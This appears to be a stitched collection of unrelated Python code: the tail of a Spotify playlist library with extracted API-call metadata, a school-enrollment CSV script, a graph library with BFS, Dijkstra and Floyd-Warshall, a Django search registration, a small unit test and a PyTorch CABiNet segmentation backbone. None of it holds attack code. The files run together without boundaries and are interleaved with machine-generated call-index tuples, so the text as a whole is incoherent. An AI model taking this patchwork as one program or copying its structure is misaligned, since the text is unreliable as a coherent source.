make_new_playlist(sp=self.sp, playlist_name=playlist_name, items=self.items)
def to_database(self, db: database.SpotifyDatabase = None) -> None:
logger.info(f"Storing collection to database. id = {self.id_}")
if db is None:
db = CollectionDatabase()
if not db.is_loaded():
raise DatabaseNotLoaded
db.store_tracks_in_database(collection=self)
def optimize(self, target_func, N: int = None) -> None:
items = list(self.items)
if N is None:
N = len(items)
diffs = np.abs(np.array([target_func(item) for item in items]))
idx = np.argsort(diffs)
n = min(N, len(items))
return TrackCollection(_items=list(np.array(items)[idx[:n]]))
def complex_sort(
self, by: str = "artist", graph: nx.Graph = nx.Graph()
) -> "TrackCollection":
items = list(self.items)
def new_items():
unique_artists = list(set([item.album.artists[0].id for item in items]))
artists = [
(
artist_id,
[item for item in items if item.album.artists[0].id == artist_id],
)
for artist_id in unique_artists
]
remaining_artists = artists
latest_artist = remaining_artists.pop(0)
new_items_ = [track for track in latest_artist[1]]
while remaining_artists:
# Find the closest artist
all_path_lengths = []
for artist in remaining_artists:
try:
path_length = nx.shortest_path_length(
graph,
source=latest_artist[0],
target=artist[0],
weight="weight",
)
except nx.NetworkXNoPath as e:
path_length = 9999999
all_path_lengths.append(path_length)
# Get the minimum
all_path_lengths = np.array(all_path_lengths)
min_idx = np.where(all_path_lengths == all_path_lengths.min())[0][0]
# Set the latest artist
latest_artist = remaining_artists.pop(min_idx)
# Add the tracks
new_items_ += [track for track in latest_artist[1]]
return (item for item in new_items_)
return TrackCollection(
_items=new_items(), _audio_features_enriched=self._audio_features_enriched
)
@dataclass
class Playlist(TrackCollection):
@classmethod
def func_get_id(cls, name):
return get_playlist_id(sp=cls.sp, playlist_name=name)
@property
def _db_track_gen(self):
return super()._db_track_gen
@property
def _api_track_gen(self):
return get_playlist_tracks(sp=self.sp, playlist_id=self.id_)
class Album(TrackCollection):
"""Class representing an Album's track contents"""
@classmethod
def func_get_id(cls, name):
return get_album_id(sp=cls.sp, album_name=name)
@property
def _db_track_gen(self):
db = CollectionDatabase()
return db.load_album(album_id=self.id_)
@property
def _api_track_gen(self):
return get_album_songs(sp=self.sp, album_id=self.id_)
class Artist(TrackCollection):
"""Class representing an Artist's track contents"""
@classmethod
def func_get_id(cls, name):
return get_artist_id(sp=cls.sp, artist_name=name)
@property
def _db_track_gen(self):
db = CollectionDatabase()
return db.load_artist(artist_id=self.id_)
@property
def _api_track_gen(self):
return self.all_songs()
def popular(self) -> "Artist":
"""Popular songs for the artist
Returns:
Artist: Artist with items set to the popular songs only
"""
def items():
for track_dict in get_artist_popular_songs(sp=self.sp, artist_id=self.id_):
yield TrackItem.from_dict(track_dict)
return Artist(id_=self.id_, _items=items())
def all_songs(self) -> "Artist":
"""All songs by the artist
Returns:
Artist: Artist with items set to all of their songs
"""
# Build album collections
album_data = get_artist_albums(artist_id=self.id_)
album_collection_items = [Album.from_id(album["id"]) for album in album_data]
album_collection = CollectionCollection(collections=album_collection_items)
# Retrieve items from album collection
if album_collection:
yield from album_collection.items
def related_artists(self, n: int, include: bool = True) -> "ArtistCollection":
"""Artists related to the artist
Args:
n (int): The number of related artists
include (bool): Whether the original artist should be included
Returns:
ArtistCollection: Collection of related artists
"""
related_artist_items = get_related_artists(sp=self.sp, artist_id=self.id_)
if include:
related_artist_items.append(self)
n += 1
related_artists = [
Artist(id_=artist_item["id"]) for artist_item in related_artist_items[:n]
]
return ArtistCollection(collections=related_artists)
class SavedTracks(TrackCollection):
"""Class representing an saved track contents"""
def __init__(self):
self._items = []
self.id_ = "Saved tracks"
@property
def _db_track_gen(self):
return super()._db_track_gen
@property
def _api_track_gen(self):
return get_all_saved_tracks(sp=self.sp)
@dataclass
class CollectionCollection(TrackCollection):
collections: List[TrackCollection] = field(default_factory=list)
def item_gen(self):
if self.collections:
yield from sum(self.collections).items
def alternate(self):
def new_items():
return itertools.chain(*zip(*[c.items for c in self.collections]))
return TrackCollection(id_="", _items=new_items())
@dataclass
class ArtistCollection(CollectionCollection):
"""Class representing a collection of artists"""
collections: List[Artist] = field(default_factory=list)
def popular(self) -> TrackCollection:
"""Popular songs of a given artist collection
Returns:
TrackCollection: New collection with all popular songs
"""
return sum([artist.popular() for artist in self.collections])
class Genre(TrackCollection):
"""Class representing an genre's track contents"""
def __init__(self, genre_name: str = "") -> None:
self.genre_name = genre_name
self._items = []
@property
def items(self) -> List[TrackItem]:
if self._items:
return self._items
else:
if self.id_:
yield from get_recommendations_for_genre(
sp=self.sp, genre_names=[self.genre_name]
)
else:
yield from iter(())
class Show(TrackCollection):
"""Class representing an show's episode contents"""
@classmethod
def func_get_id(cls, name):
return get_show_id(sp=cls.sp, query=name)
@property
def _db_track_gen(self):
return self._api_track_gen # TBD
@property
def _api_track_gen(self):
for ep_dict in get_show_episodes(sp=self.sp, show_id=self.id_):
yield EpisodeItem.from_dict(ep_dict)
def item_gen(self):
yield from self._api_track_gen
class Track(TrackCollection):
"""Class representing a single-track collection"""
def __init__(self, id_: str):
self.id_ = id_
self._items = iter([TrackItem.from_dict(read_track_from_id(track_id=id_))])
@classmethod
def func_get_id(cls, name):
return get_track_id(sp=cls.sp, track_name=name)
class CollectionDatabase(
database.SpotifyDatabase, metaclass=database.DatabaseSingleton
):
def __init__(self, file_path=None, op_table=None):
super().__init__(file_path=file_path, op_table=op_table)
def is_loaded(self):
return self.file_path is not None
def init_db(db_path):
CollectionDatabase(file_path=db_path, op_table="operations")
| [
"logging.getLogger",
"itertools.islice",
"random.sample",
"copy.deepcopy",
"random.shuffle",
"dataclasses.asdict",
"itertools.tee",
"networkx.Graph",
"networkx.shortest_path_length",
"numpy.argsort",
"numpy.array",
"inspect.getsource",
"spotify_flows.database.SpotifyDatabase",
"pandas.Data... | [((1263, 1282), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (1280, 1282), False, 'import logging\n'), ((1788, 1815), 'dataclasses.field', 'field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (1793, 1815), False, 'from dataclasses import dataclass, field, asdict\n'), ((20879, 20906), 'dataclasses.field', 'field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (20884, 20906), False, 'from dataclasses import dataclass, field, asdict\n'), ((21347, 21374), 'dataclasses.field', 'field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (21352, 21374), False, 'from dataclasses import dataclass, field, asdict\n'), ((1895, 1910), 'copy.copy', 'copy.copy', (['self'], {}), '(self)\n', (1904, 1910), False, 'import copy\n'), ((3193, 3244), 'spotify_flows.database.SpotifyDatabase', 'database.SpotifyDatabase', (['db_path'], {'op_table': '"""table"""'}), "(db_path, op_table='table')\n", (3217, 3244), True, 'import spotify_flows.database as database\n'), ((7116, 7141), 'pandas.DataFrame', 'pd.DataFrame', (['all_artists'], {}), '(all_artists)\n', (7128, 7141), True, 'import pandas as pd\n'), ((7243, 7275), 'pandas.DataFrame', 'pd.DataFrame', (['all_audio_features'], {}), '(all_audio_features)\n', (7255, 7275), True, 'import pandas as pd\n'), ((7301, 7325), 'pandas.DataFrame', 'pd.DataFrame', (['all_tracks'], {}), '(all_tracks)\n', (7313, 7325), True, 'import pandas as pd\n'), ((7544, 7570), 'pandas.DataFrame', 'pd.DataFrame', (['album_artist'], {}), '(album_artist)\n', (7556, 7570), True, 'import pandas as pd\n'), ((7959, 7989), 'random.shuffle', 'random.shuffle', (['new_items_list'], {}), '(new_items_list)\n', (7973, 7989), False, 'import random\n'), ((14164, 14185), 'copy.copy', 'copy.copy', (['self.items'], {}), '(self.items)\n', (14173, 14185), False, 'import copy\n'), ((14427, 14446), 'copy.deepcopy', 'copy.deepcopy', (['self'], {}), '(self)\n', (14440, 14446), False, 'import copy\n'), ((14689, 14720), 'itertools.islice', 'itertools.islice', (['self.items', 'n'], {}), '(self.items, n)\n', (14705, 14720), False, 'import itertools\n'), ((15633, 15650), 'numpy.argsort', 'np.argsort', (['diffs'], {}), '(diffs)\n', (15643, 15650), True, 'import numpy as np\n'), ((15827, 15837), 'networkx.Graph', 'nx.Graph', ([], {}), '()\n', (15835, 15837), True, 'import networkx as nx\n'), ((6747, 6760), 'dataclasses.asdict', 'asdict', (['track'], {}), '(track)\n', (6753, 6760), False, 'from dataclasses import dataclass, field, asdict\n'), ((6936, 6955), 'dataclasses.asdict', 'asdict', (['track.album'], {}), '(track.album)\n', (6942, 6955), False, 'from dataclasses import dataclass, field, asdict\n'), ((11460, 11490), 'itertools.tee', 'itertools.tee', (['other.items', '(20)'], {}), '(other.items, 20)\n', (11473, 11490), False, 'import itertools\n'), ((12466, 12494), 'itertools.tee', 'itertools.tee', (['self.items', '(2)'], {}), '(self.items, 2)\n', (12479, 12494), False, 'import itertools\n'), ((7166, 7190), 'pandas.DataFrame', 'pd.DataFrame', (['all_albums'], {}), '(all_albums)\n', (7178, 7190), True, 'import pandas as pd\n'), ((8529, 8558), 'random.sample', 'random.sample', (['all_items'], {'k': 'k'}), '(all_items, k=k)\n', (8542, 8558), False, 'import random\n'), ((12518, 12552), 'itertools.islice', 'itertools.islice', (['before', 'position'], {}), '(before, position)\n', (12534, 12552), False, 'import itertools\n'), ((17096, 17122), 'numpy.array', 'np.array', (['all_path_lengths'], {}), '(all_path_lengths)\n', (17104, 17122), True, 'import numpy as np\n'), ((10824, 10856), 'inspect.getsource', 'inspect.getsource', (['criteria_func'], {}), '(criteria_func)\n', (10841, 10856), False, 'import inspect\n'), ((15725, 15740), 'numpy.array', 'np.array', (['items'], {}), '(items)\n', (15733, 15740), True, 'import numpy as np\n'), ((16641, 16735), 'networkx.shortest_path_length', 'nx.shortest_path_length', (['graph'], {'source': 'latest_artist[0]', 'target': 'artist[0]', 'weight': '"""weight"""'}), "(graph, source=latest_artist[0], target=artist[0],\n weight='weight')\n", (16664, 16735), True, 'import networkx as nx\n')] |
#!/usr/bin/env python
import csv
import string
import sys
f = open('public_enrollment.txt')
pub = csv.reader(f, csv.excel_tab)
sys.stdout = open('popcounts.csv', 'wt')
h = pub.__next__()
last = None
grades = 0
for r in pub:
r = [n.replace(',','') for n in r]
school = '{:04d}-{:02d}-{:03d}'.format(int(r[3]), int(r[4]), int(r[6]))
grade = r[11]
if grade == 'All Grades':
data = [school, r[5], r[7], r[2], r[12], str(grades)]
data = [_.strip() for _ in data]
print(','.join(data))
grades = 0
else:
try:
grades = grades | 2**int(r[11])
except:
if r[11] in ('KG', 'PK', 'ECSE'):
grades = grades | 1 # 2**0
f = open('nonpublic_enrollment.txt', 'rt')
pub = csv.reader(f, csv.excel_tab)
h = pub.__next__()
last = None
grades = 0
for r in pub:
r = [n.replace(',','') for n in r]
school = '{:04d}-{:02d}-{:03d}'.format(int(r[1]), int(r[2]), int(r[4]))
data = [school, r[3], r[5], r[27], r[21]]
grades = 0
for n in range(6,19):
if r[n] != '0':
grades = grades | 2**int(n-6)
data = [school, r[3], r[5], r[27], r[21], str(grades)]
data = [string.capwords(_.strip()) for _ in data]
print(','.join(data))
| [
"csv.reader"
] | [((100, 128), 'csv.reader', 'csv.reader', (['f', 'csv.excel_tab'], {}), '(f, csv.excel_tab)\n', (110, 128), False, 'import csv\n'), ((766, 794), 'csv.reader', 'csv.reader', (['f', 'csv.excel_tab'], {}), '(f, csv.excel_tab)\n', (776, 794), False, 'import csv\n')] |
from libs.graph.DLinkedList import Queue, DoubledLinkedList as List
from libs.graph.PriorityQueue import PriorityQueueBinary as PriorityQueue
from libs.graph.Tree import *
#it is better to use a DoubledLinkedList to operate with a great efficiency on
#the lists those will be used in the graph representation
class Node:
def __init__(self, elem, index, weight = None):
"""
this class represents a graph node
:param elem: an object stored into the node
:param index: int, the index by which the node may be identified
:param weight: int, the weight of the node and of his object - may not be used
"""
self._elem = elem
self._index = index
self._weight = weight
self._token = None #used to mark each node during a generic visit
self._distance = 0 #used to set and retrieve the distance of the node in the visit
self._knights = 0 #used to keep trace of the knights in the node
self._knights_arrived = []
def get_elem(self):
"""
:return: object stored in the node
"""
return self._elem
def get_index(self):
"""
:return: int, the index of the node
"""
return self._index
def get_weight(self):
"""
:return: int, the weight of the node
"""
return self._weight
def get_token(self):
"""
:return: int, the token of the node
"""
return self._token
def set_token(self, token):
"""
:param token: int, the validation token
:return: int, the token of the node
"""
self._token = token
def get_node(self):
"""
:return: tuple, (index, elem, weight)
"""
return self.get_elem(), self.get_weight()
def set_distance(self, dist):
"""
this function can be used to set a particular distance in order to provide
a good interface for BFS and Dijkstra shortest-path algorithms
:param dist: int, distance
:return: None
"""
self._distance += dist
self._knights += 1
def get_distance(self):
"""
:return: int, the distance calculated for the node
"""
return self._distance
def get_count(self):
"""
:return: int, the number of knights
"""
return self._knights
#I'll use an AdjacenceList Graph because of the unitarian value of all the arcs
class GraphAdjacenceList:
def __init__(self):
"""
this class represents a graph using an adjacency list style
"""
self._nodes = dict() #to store the nodes
self._adjacency = dict() #to link the nodes to their adjacence list
self._nextId = 0 #it will be used to store the nodes - id > 0
self._nodes_elems = dict() #it will be used to store the elems inserted
def getNodes(self):
"""
this function is used as an interface to retrieve graph's nodes
:return: (dictionary, dictionary) the nodes and their adjacency lists
"""
return self._nodes, self._adjacency
def insertNode(self, elem, weight = None):
"""
this function allows the user to insert a node into the graph
:param elem: the elem to be stored into the node
:param weight: the weight of the node
:return: Node, the node already inserted or just inserted
"""
if elem in self._nodes_elems:
#if a node has already setted it will be returned
#assuming the computational cost of this check, as it is implemented in python,
#as memory access to the list -> O(1)
return self._nodes_elems[elem]
newNode = Node(elem, self._nextId, weight)
self._nodes[newNode.get_index()] = newNode
self._adjacency[newNode.get_index()] = List()
self._nextId += 1
#storing the elem just inserted
self._nodes_elems[elem] = newNode
return newNode
def linkNode(self, tail, head):
"""
this function links two nodes in a direct connection
:param tail: Node, the tail node
:param head: Node, the head node
:return: None
"""
adj = self._adjacency[tail.get_index()]
if head not in adj.getLastAddedList():
#assuming direct memory access... (see previous method)
adj.addAsLast(head)
def printGraph(self):
"""
this function builds a well formatted visualization of the nodes
:return: list, a list of nodes visual formatted
"""
print("Adjacency Lists:")
for identifier in self._nodes:
print("node", self._nodes[identifier].get_elem(), self._nodes[identifier].get_weight())
self._adjacency[identifier].printList()
print("")
#The chessboard's graph is unitary-weight-arcs formed so we can use a Breadth First Search to return the list of all the
#minimum-path-trees starting each from a knight
def validateNodes(self, token):
"""
this function validate all nodes with a token value in order to accomplish the visit
:param token: int, the token value to validate the node. 0 if not visited, 21 if explored and 42 (for Douglas) if closed
:return: None
"""
nodes = self.getNodes()[0]
for node in nodes.itervalues():
node.set_token(token)
def visitBFS(self, node):
"""
this is a Breadth First Search starting from a vertex. Please note that all the operations are done on the leaves
to let the algorithm be more modular (it doesn't seems be affecting the computational time for it remains proportional
to the dimension of the graph)
:param node: Node, the starting vertex
:return: Tree, representing the visit path
"""
#initializing some useful constants (funny constants too)
unexplored = 0
explored = 21
closed = 42 #So long and thanks for all the fish!
#validating all the nodes as unexplored and starting from the vertex
self.validateNodes(unexplored)
node.set_token(explored)
#initializing the tree containing the only vertex
T_root = Leaf(node)
T_root.setDistance(0.0) #using the float - it is not a counter value
T = Tree(T_root)
#initializing the fringe of the visit
F = Queue()
F.enqueue(T_root)
while not F.isEmpty():
u = F.dequeue()
n = u.getElem()
n.set_token(closed)
for v in self._adjacency[n.get_index()].getLastAddedList():
if v.get_token() == unexplored:
v.set_token(explored)
l = Leaf(v)
F.enqueue(l)
T.insertLeaf(l, u)
return T
def visitNodesBFS(self, Nodes):
"""
this is a simple implementation of a Breadth First Search algorithm to visit the graph
starting from a selected group of nodes
:param Nodes: Node list containing the nodes from which start the visit
:return: list of Trees, the list of all the visits
"""
T_list = []
for node in Nodes:
tree = self.visitBFS(node)
T_list.append(tree)
return T_list
#it is interesting to achieve the same result using minimum path algorithm of Dijkstra
def Dijkstra(self, node):
"""
this is a Dijstra shortest path algorithm implementation starting from a vertex
:param node: Node, the starting vertex
:return: Tree, the shortest paths tree
"""
INF = float('inf')
self.validateNodes(INF)
#we will use the nodes' tokens to store the distance info!
node.set_token(0.0) #0-distance from itself!
#initializing the tree
T_root = Leaf(node)
T_root.setDistance(node.get_token())
T = Tree(T_root)
#initializing a dictionary to keep trace of the leaves
leaves = dict()
leaves[node] = T_root
#initializing the priority queue to mantain the fringe
PQ = PriorityQueue()
PQ.insert(T_root, node.get_token())
while not PQ.isEmpty():
u = PQ.deleteMin() #retrieving the min node from the leaf
n = u.getElem()
for v in self._adjacency[n.get_index()].getLastAddedList():
if v.get_token() == INF:
l = Leaf(v)
leaves[v] = l #updating the leaves' dictionary
PQ.insert(l, n.get_token() + 1.0) #each edge will be unitary-cost
v.set_token(n.get_token() + 1.0)
T.insertLeaf(l, u)
elif n.get_token() + 1.0 < v.get_token():
relaxed = n.get_token() + 1.0
leaves[v].setDistance(relaxed)
#updating the tree... (we are now saving in the priority queue the leaves)
leaves[v].setFather(u)
leaves[n].addSon(leaves[v])
#updating the priority queue
PQ.decreaseKey(leaves[v], relaxed)
v.set_token(relaxed)
return T
def visitDijkstra(self, Nodes):
"""
this is an implementation of the Dijkstra algorithm to visit the graph
starting from a selected group of nodes
:param Nodes: Node list containing the nodes from which start the visit
:return: list of Trees, the list of all the visits
"""
T_list = []
for node in Nodes:
tree = self.Dijkstra(node)
T_list.append(tree)
return T_list
#Pay attention!
# -Bellman condition to decide a shortest path -> for each node it is O(k*n) where k is node's degree
# -save the all available paths in a tree instead of a list of lists -> O(n) (if it is possible...)
# -the chessboard graph is a direct graph with all the arcs costing a single unit
# (please note that it is necessary to consider each knight own k-value in order to calculate
# the move number!!)
# -general purpose: in python2.7 the infinite is... INF = float('inf') -> comparisons using floats
def FloydWarshall(self):
"""
this is a simple implementation of the Floyd-Warshall algorythm using an O(n^2) space
but O(n^3) computational complexity. Please note that in our case the chessboard graph
is unitary-weight-arch created
:return: list of lists, matrix of the distances between two vertices
"""
INF = float('inf')
nodes, adjacency = self.getNodes() #getting the dictionaries
indexes = nodes.keys() #it is the same to access the two dictionaries
dim = len(indexes)
#initializing the matrix
dist = [[INF for m in range(dim)] for n in range(dim)]
for i in range(dim):
ind = indexes[i]
dist[ind][ind] = 0.0
adj_nodes = adjacency[ind].getLastAddedList()
for adj in adj_nodes:
to_ind = adj.get_index()
dist[ind][to_ind] = 1.0
#executing the dinamic programming algorithm
for k in range(dim):
for i in range(dim):
for j in range(dim):
if dist[i][k] != INF and dist[k][j] != INF and dist[i][k] + dist[k][j] < dist[i][j]:
dist[i][j] = dist[i][k] + dist[k][j]
return dist
| [
"libs.graph.DLinkedList.DoubledLinkedList",
"libs.graph.DLinkedList.Queue",
"libs.graph.PriorityQueue.PriorityQueueBinary"
] | [((3897, 3903), 'libs.graph.DLinkedList.DoubledLinkedList', 'List', ([], {}), '()\n', (3901, 3903), True, 'from libs.graph.DLinkedList import Queue, DoubledLinkedList as List\n'), ((6476, 6483), 'libs.graph.DLinkedList.Queue', 'Queue', ([], {}), '()\n', (6481, 6483), False, 'from libs.graph.DLinkedList import Queue, DoubledLinkedList as List\n'), ((8222, 8237), 'libs.graph.PriorityQueue.PriorityQueueBinary', 'PriorityQueue', ([], {}), '()\n', (8235, 8237), True, 'from libs.graph.PriorityQueue import PriorityQueueBinary as PriorityQueue\n')] |
from django.utils.translation import ugettext_lazy as _
from mayan.apps.documents.search import document_page_search, document_search
document_page_search.add_model_field(
field='document_version__document__comments__comment',
label=_('Comments')
)
document_search.add_model_field(
field='comments__comment',
label=_('Comments')
)
| [
"django.utils.translation.ugettext_lazy"
] | [((243, 256), 'django.utils.translation.ugettext_lazy', '_', (['"""Comments"""'], {}), "('Comments')\n", (244, 256), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((333, 346), 'django.utils.translation.ugettext_lazy', '_', (['"""Comments"""'], {}), "('Comments')\n", (334, 346), True, 'from django.utils.translation import ugettext_lazy as _\n')] |
import unittest
import csv_functions
class TestCsvFunctions(unittest.TestCase):
def test_open_test_file(self):
expected = [['X', 'Y'], ['0', '0'], ['1', '10'], ['2', '15'], ['3', '50'], ['4', '80'], ['5', '100'],
['6', '80'], ['7', '45'], ['8', '35'], ['9', '15'], ['10', '5']]
actual = csv_functions.csv_open('test_1.csv')
self.assertEqual(expected, actual)
expected = [['X', 'Y'], ['0', '0'], ['1', '20'], ['2', '30'], ['3', '100'], ['4', '160'], ['5', '200'],
['6', '160'], ['7', '90'], ['8', '70'], ['9', '30'], ['10', '10']]
actual = csv_functions.csv_open('test_2.csv')
self.assertEqual(expected, actual)
| [
"csv_functions.csv_open"
] | [((332, 368), 'csv_functions.csv_open', 'csv_functions.csv_open', (['"""test_1.csv"""'], {}), "('test_1.csv')\n", (354, 368), False, 'import csv_functions\n'), ((632, 668), 'csv_functions.csv_open', 'csv_functions.csv_open', (['"""test_2.csv"""'], {}), "('test_2.csv')\n", (654, 668), False, 'import csv_functions\n')] |
# Copyright (c) 2020. Huawei Technologies Co., Ltd.
# SPDX-License-Identifier: Apache-2.0
#
# Copyright (c) 2019 MendelXu
# SPDX-License-Identifier: Apache-2.0
#
# Copyright (C) 2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
#
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.cnn import ConvModule, DepthwiseSeparableConvModule, constant_init, normal_init
from mmcv.runner import load_checkpoint
from mmcv.utils.parrots_wrapper import _BatchNorm
from mmseg.utils import get_root_logger
from mmseg.models.utils import LocalAttentionModule, PSPModule
from ..builder import BACKBONES
from .mobilenet_v3 import MobileNetV3
class SpatialBranch(nn.Module):
def __init__(self,
in_channels,
stem_channels,
out_channels,
conv_cfg=None,
norm_cfg=dict(type='BN')):
super().__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.conv_cfg = conv_cfg
self.norm_cfg = norm_cfg
self.conv1 = ConvModule(
in_channels=in_channels,
out_channels=stem_channels,
kernel_size=7,
stride=2,
padding=3,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg,
act_cfg=dict(type='ReLU')
)
self.conv2 = DepthwiseSeparableConvModule(
in_channels=stem_channels,
out_channels=stem_channels,
kernel_size=3,
stride=2,
padding=1,
norm_cfg=norm_cfg,
act_cfg=dict(type='ReLU'),
dw_act_cfg=None,
pw_act_cfg=dict(type='ReLU')
)
self.conv3 = DepthwiseSeparableConvModule(
in_channels=stem_channels,
out_channels=stem_channels,
kernel_size=3,
stride=2,
padding=1,
norm_cfg=norm_cfg,
act_cfg=dict(type='ReLU'),
dw_act_cfg=None,
pw_act_cfg=dict(type='ReLU')
)
self.conv_out = ConvModule(
in_channels=stem_channels,
out_channels=out_channels,
kernel_size=1,
stride=1,
padding=0,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg,
act_cfg=dict(type='ReLU')
)
def forward(self, x):
y = self.conv1(x)
y = self.conv2(y)
y = self.conv3(y)
out = self.conv_out(y)
return out
class GhostModule(nn.Module):
"""Reference:
https://github.com/huawei-noah/CV-Backbones/blob/master/ghostnet_pytorch/ghostnet.py
License: https://github.com/huawei-noah/CV-Backbones/blob/master/ghostnet_pytorch/License.txt
"""
def __init__(self,
in_channels,
out_channels,
kernel_size=1,
ratio=2,
dw_size=3,
stride=1,
conv_cfg=None,
norm_cfg=dict(type='BN')):
super().__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.conv_cfg = conv_cfg
self.norm_cfg = norm_cfg
init_channels = math.ceil(out_channels / ratio)
new_channels = init_channels * (ratio - 1)
self.primary_conv = ConvModule(
in_channels=self.in_channels,
out_channels=init_channels,
kernel_size=kernel_size,
stride=stride,
padding=kernel_size // 2,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg,
act_cfg=dict(type='ReLU')
)
self.cheap_operation = ConvModule(
in_channels=init_channels,
out_channels=new_channels,
kernel_size=dw_size,
stride=1,
padding=dw_size // 2,
groups=init_channels,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg,
act_cfg=dict(type='ReLU')
)
def forward(self, x):
x1 = self.primary_conv(x)
x2 = self.cheap_operation(x1)
out = torch.cat([x1, x2], dim=1)
out = out[:, :self.out_channels, :, :]
return out
class CAPAttentionModule(nn.Module):
"""Reference: https://github.com/MendelXu/ANN
"""
def __init__(self,
num_channels,
key_channels,
psp_size=(1, 3, 6, 8),
conv_cfg=None,
norm_cfg=dict(type='BN')):
super().__init__()
self.num_channels = num_channels
self.key_channels = key_channels
self.conv_cfg = conv_cfg
self.norm_cfg = norm_cfg
self.query = ConvModule(
in_channels=self.num_channels,
out_channels=self.key_channels,
kernel_size=1,
stride=1,
padding=0,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg,
act_cfg=dict(type='ReLU')
)
self.key = nn.Sequential(
GhostModule(self.num_channels, self.key_channels, conv_cfg=self.conv_cfg, norm_cfg=self.norm_cfg),
PSPModule(psp_size)
)
self.value = nn.Sequential(
GhostModule(self.num_channels, self.num_channels, conv_cfg=self.conv_cfg, norm_cfg=self.norm_cfg),
PSPModule(psp_size)
)
def forward(self, x):
batch_size, h, w = x.size(0), x.size(2), x.size(3)
key = self.key(x)
value = self.value(x).permute(0, 2, 1)
query = self.query(x).view(batch_size, self.key_channels, -1).permute(0, 2, 1)
sim_map = torch.matmul(query, key)
sim_map = (self.key_channels ** -0.5) * sim_map
sim_map = F.softmax(sim_map, dim=-1)
context = torch.matmul(sim_map, value)
context = context.permute(0, 2, 1).contiguous()
context = context.view(batch_size, self.num_channels, *x.size()[2:])
out = x + context
return out
class ContextBranch(nn.Module):
def __init__(self,
in_channels,
out_channels,
conv_cfg=None,
norm_cfg=dict(type='BN')):
super().__init__()
self.in_channels = in_channels
assert self.in_channels == 3
self.out_channels = out_channels
self.conv_cfg = conv_cfg
self.norm_cfg = norm_cfg
self.backbone = MobileNetV3(
arch='small',
out_indices=(12,),
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg,
)
self.cab = nn.Sequential(
CAPAttentionModule(
num_channels=576,
key_channels=128,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg
),
LocalAttentionModule(
num_channels=576,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg
)
)
self.conv_out = ConvModule(
in_channels=576,
out_channels=128,
kernel_size=1,
stride=1,
padding=0,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg,
act_cfg=dict(type='ReLU')
)
def forward(self, x):
y = self.backbone(x)[0]
y = self.cab(y)
out = self.conv_out(y)
return out
class FeatureFusionModule(nn.Module):
def __init__(self,
in_channels,
out_channels,
conv_cfg=None,
norm_cfg=dict(type='BN')):
super(FeatureFusionModule, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.conv_cfg = conv_cfg
self.norm_cfg = norm_cfg
self.conv_mix = ConvModule(
in_channels=self.in_channels,
out_channels=self.out_channels,
kernel_size=1,
stride=1,
padding=0,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg,
act_cfg=dict(type='ReLU')
)
self.conv_sep = DepthwiseSeparableConvModule(
in_channels=self.out_channels,
out_channels=self.out_channels,
kernel_size=3,
stride=1,
padding=1,
norm_cfg=norm_cfg,
act_cfg=dict(type='ReLU'),
dw_act_cfg=None,
pw_act_cfg=dict(type='ReLU')
)
self.attention = nn.Sequential(
nn.AdaptiveAvgPool2d((1, 1)),
ConvModule(
in_channels=self.out_channels,
out_channels=self.out_channels // 4,
kernel_size=1,
stride=1,
padding=0,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg,
act_cfg=dict(type='ReLU')
),
ConvModule(
in_channels=self.out_channels // 4,
out_channels=self.out_channels,
kernel_size=1,
stride=1,
padding=0,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg,
act_cfg=None
),
nn.Sigmoid()
)
self.conv_out = ConvModule(
in_channels=self.out_channels,
out_channels=self.out_channels,
kernel_size=1,
stride=1,
padding=0,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg,
act_cfg=dict(type='ReLU')
)
def forward(self, fsp, fcp):
_, _, h, w = fsp.size()
fcp = F.interpolate(fcp, size=(h, w), mode='bilinear', align_corners=True)
y = torch.cat([fsp, fcp], dim=1)
y = self.conv_mix(y)
y = self.conv_sep(y)
mask = self.attention(y)
y = y + mask * y
out = self.conv_out(y)
return out
@BACKBONES.register_module()
class CABiNet(nn.Module):
"""CABiNet backbone.
`Efficient Context Aggregation Network for Low-Latency Semantic Segmentation
<http://essay.utwente.nl/84370/1/84370_Sasena_Thesis.pdf>`_
"""
def __init__(self,
extra,
in_channels=3,
conv_cfg=None,
norm_cfg=dict(type='BN'),
norm_eval=False):
super().__init__()
self.extra = extra
self.conv_cfg = conv_cfg
self.norm_cfg = norm_cfg
self.norm_eval = norm_eval
self.spatial_branch = SpatialBranch(
in_channels=in_channels,
stem_channels=64,
out_channels=128,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg
)
self.context_branch = ContextBranch(
in_channels=in_channels,
out_channels=128,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg
)
self.ffm = FeatureFusionModule(
in_channels=256,
out_channels=128,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg
)
def init_weights(self, pretrained=None):
"""Initialize the weights in backbone.
Args:
pretrained (str, optional): Path to pre-trained weights.
Defaults to None.
"""
if isinstance(pretrained, str):
logger = get_root_logger()
load_checkpoint(self, pretrained, strict=False, logger=logger)
elif pretrained is None:
for m in self.modules():
if isinstance(m, nn.Conv2d):
normal_init(m, std=0.001)
elif isinstance(m, _BatchNorm):
constant_init(m, 1)
else:
raise TypeError('pretrained must be a str or None')
def forward(self, x):
"""Forward function."""
spatial = self.spatial_branch(x)
context = self.context_branch(x)
fused = self.ffm(spatial, context)
y_list = [spatial, context, fused]
return y_list
def train(self, mode=True):
"""Convert the model into training mode."""
super().train(mode)
